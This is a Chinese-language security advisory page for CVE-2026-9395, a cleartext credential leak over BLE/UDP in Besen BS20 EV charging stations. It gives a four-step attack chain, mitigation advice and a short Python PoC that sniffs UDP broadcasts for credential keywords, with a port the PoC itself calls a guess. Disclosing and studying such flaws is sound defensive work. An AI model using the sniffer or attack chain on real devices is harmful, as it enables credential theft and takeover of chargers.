IPBUF安全漏洞报告
English
CVE-2026-9395 CVSS 3.5 低危

CVE-2026-9395 Besen充电站凭据泄露漏洞

披露日期: 2026-05-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-9395
漏洞类型
信息泄露
CVSS评分
3.5 低危
攻击向量
邻接 (AV:A)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Besen BS20 EV Charging Station

相关标签

CVE-2026-9395Information DisclosureBesenEV ChargerBLEUDPCleartext Credentials

漏洞概述

Besen BS20 EV充电站在版本20260426及之前存在安全漏洞。该漏洞源于BLE/UDP组件中的未知功能对凭据保护不足。攻击者需要在本地网络范围内发起攻击,利用该漏洞可能导致敏感凭据泄露。原始披露信息显示,供应商已收到报告并正在审查该问题。

技术细节

该漏洞存在于Besen BS20 EV充电站的BLE(低功耗蓝牙)和UDP通信组件中。由于设备在处理特定网络请求或蓝牙交互时未能对敏感数据进行充分的加密或保护机制,导致用户凭据以明文形式传输或存储。攻击者可以通过接入本地网络,监听UDP广播流量或主动与设备进行BLE交互,捕获包含认证信息的网络数据包。由于CVSS向量显示攻击需要邻接网络访问权限(AV:A)且需要低权限(PR:L),这通常意味着攻击者已经处于同一局域网内或具备近距离物理访问能力。成功利用此漏洞不会影响系统完整性或可用性,但会导致机密性受损(C:L),攻击者可获取设备管理凭证,进而可能进一步控制设备。

攻击链分析

STEP 1
步骤1:侦察
攻击者接入本地网络,扫描并识别目标Besen BS20 EV充电站设备。
STEP 2
步骤2:流量监听
攻击者配置网络嗅探工具或运行自定义脚本,监听设备发送的UDP广播数据包或BLE广播包。
STEP 3
步骤3:数据截获
由于设备未加密传输凭据,攻击者截获包含明文用户名和密码的数据包。
STEP 4
步骤4:未授权访问
攻击者利用截获的凭证登录设备管理界面,获取设备控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket import struct # PoC for CVE-2026-9395: Credential Exposure via UDP # This script listens for UDP broadcasts from the Besen BS20 EV Charger # to capture cleartext credentials. UDP_IP = "0.0.0.0" UDP_PORT = 5000 # Example port, adjust based on actual firmware analysis sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind((UDP_IP, UDP_PORT)) print(f"[*] Listening for Besen BS20 UDP packets on port {UDP_PORT}...") while True: data, addr = sock.recvfrom(1024) # buffer size is 1024 bytes print(f"[+] Received packet from {addr}") try: # Attempt to decode payload, assuming cleartext transmission decoded = data.decode('utf-8', errors='ignore') print(f"[Payload]: {decoded}") # Check for common credential keywords if 'password' in decoded.lower() or 'admin' in decoded.lower(): print("[!] Potential credential found in packet!") except Exception as e: print(f"Error decoding packet: {e}")

影响范围

Besen BS20 EV Charging Station <= 20260426

防御指南

临时缓解措施
建议将充电站设备放置在隔离的VLAN中,限制局域网内不必要的流量访问。如果固件无法立即更新,建议暂时关闭设备的BLE功能,并限制对设备UDP端口的网络访问,仅允许可信的管理终端连接。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表